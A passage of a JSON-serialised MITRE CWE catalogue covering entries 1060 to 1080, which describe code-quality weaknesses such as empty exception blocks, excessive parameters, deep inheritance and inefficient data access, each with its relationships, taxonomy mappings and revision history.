vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1060":{"attr":{"@_ID":"1060","@_Name":"Excessive Number of Inefficient Server-Side Data Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs too many data queries without using efficient data processing functionality such as stored procedures.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly due to computational expense.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"too many data queries\\" may vary for each product or developer, CISQ recommends a default maximum of 5 data queries for an inefficient function/procedure."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1061":{"attr":{"@_ID":"1061","@_Name":"Insufficient Encapsulation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-969"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1062":{"attr":{"@_ID":"1062","@_Name":"Parent Class with References to Child Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a parent class that contains references to a child class, its methods, or its members.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1063":{"attr":{"@_ID":"1063","@_Name":"Creation of Class Instance within a Static Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A static code block creates an instance of a class.","Extended_Description":{"xhtml:p":["This pattern identifies situations where a storable data element or member data element is initialized with a value in a block of code which is declared as static.","This issue can make the software perform more slowly by performing initialization before it is needed.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1064":{"attr":{"@_ID":"1064","@_Name":"Invokable Control Element with Signature Containing an Excessive Number of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a function, subroutine, or method whose signature has an unnecessarily large number of\\n\\t\\t\\t\\t\\tparameters/arguments.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parameters.\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parameters/arguments."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-13"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-13"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1065":{"attr":{"@_ID":"1065","@_Name":"Runtime Resource Management Control Element in a Component Built to Run on Application Servers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1066":{"attr":{"@_ID":"1066","@_Name":"Missing Serialization Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable data element that does not\\n\\t\\t\\t\\t\\thave an associated serialization method.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably, e.g. by triggering an exception.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1067":{"attr":{"@_ID":"1067","@_Name":"Excessive Execution of Sequential Searches of Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a data query against an SQL table or view\\n\\t\\t\\t\\t\\tthat is configured in a way that does not utilize an index and may cause\\n\\t\\t\\t\\t\\tsequential searches to be performed.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1068":{"attr":{"@_ID":"1068","@_Name":"Inconsistency Between Implementation and Documented Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The implementation of the product is not consistent with the\\n\\t\\t\\t\\t\\tdesign as described within the relevant documentation.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1069":{"attr":{"@_ID":"1069","@_Name":"Empty Exception Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.","Extended_Description":{"xhtml:p":"When an exception handling block (such as a Catch and Finally block) is used, but that block is empty, this can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1070":{"attr":{"@_ID":"1070","@_Name":"Serializable Data Element Containing non-Serializable Item Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable, storable data element such as a field or member,\\n\\t\\t\\t\\t\\tbut the data element contains member elements that are not\\n\\t\\t\\t\\t\\tserializable.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1071":{"attr":{"@_ID":"1071","@_Name":"Empty Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains a block that does not contain any code, i.e., the block is empty.","Extended_Description":{"xhtml:p":"Empty code blocks can occur in the bodies of conditionals, function or method definitions, exception handlers, etc.  While an empty code block might be intentional, it might also indicate incomplete implementation, accidental code deletion, unexpected macro expansion, etc.  For some programming languages and constructs, an empty block might be allowed by the syntax, but the lack of any behavior within the block might violate a convention or API in such a way that it is an error."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1072":{"attr":{"@_ID":"1072","@_Name":"Data Resource Access without Use of Connection Pooling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software accesses a data resource through a database without using a\\n\\t\\t\\t\\t\\tconnection pooling capability.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, as connection pools allow connections to be reused without the overhead and time consumption of opening and closing a new connection.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-13"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-13"}},{"attr":{"@_External_Reference_ID":"REF-974"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1073":{"attr":{"@_ID":"1073","@_Name":"Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large number of data accesses/queries\\" may vary for each product or developer, CISQ recommends a default maximum of 2 data accesses per function/method."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1074":{"attr":{"@_ID":"1074","@_Name":"Class with Excessively Deep Inheritance","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class has an inheritance level that is too high, i.e., it\\n\\t\\t\\t\\t\\thas a large number of parent classes.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parent classes\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parent classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-17"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-17"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1075":{"attr":{"@_ID":"1075","@_Name":"Unconditional Control Flow Transfer outside of Switch Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs unconditional control transfer (such as a\\n\\t\\t\\t\\t\\t\\"goto\\") in code outside of a branching structure such as a switch\\n\\t\\t\\t\\t\\tblock.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1076":{"attr":{"@_ID":"1076","@_Name":"Insufficient Adherence to Expected Conventions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture, source code, design, documentation,\\n\\t\\t\\t\\t\\tor other artifact does not follow required conventions.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1077":{"attr":{"@_ID":"1077","@_Name":"Floating Point Comparison with Incorrect Operator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison such as an\\n        equality test between two float (floating point) values, but\\n        it uses comparison operators that do not account for the\\n        possibility of loss of precision.","Extended_Description":{"xhtml:p":["Numeric calculation using floating point values\\n\\t   can generate imprecise results because of rounding errors.\\n\\t   As a result, two different calculations might generate\\n\\t   numbers that are mathematically equal, but have slightly\\n\\t   different bit representations that do not translate to the\\n\\t   same mathematically-equal values.  As a result, an equality\\n\\t   test or other comparison might produce unexpected\\n\\t   results.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-9"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-9"}},{"attr":{"@_External_Reference_ID":"REF-975"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1078":{"attr":{"@_ID":"1078","@_Name":"Inappropriate Source Code Style or Formatting","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code does not follow\\n\\t\\t\\t\\tdesired style or formatting for indentation, white\\n\\t\\t\\t\\tspace, comments, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1079":{"attr":{"@_ID":"1079","@_Name":"Parent Class without Virtual Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably due to undefined or unexpected behaviors.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1080":{"attr":{"@_ID":"1080","@_Name":"Source Code File with Excessive Number of Lines of Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A source code file has too many lines of\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many lines of code\\" may vary for each product or developer, CISQ recommends a default threshold value of 1000."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG 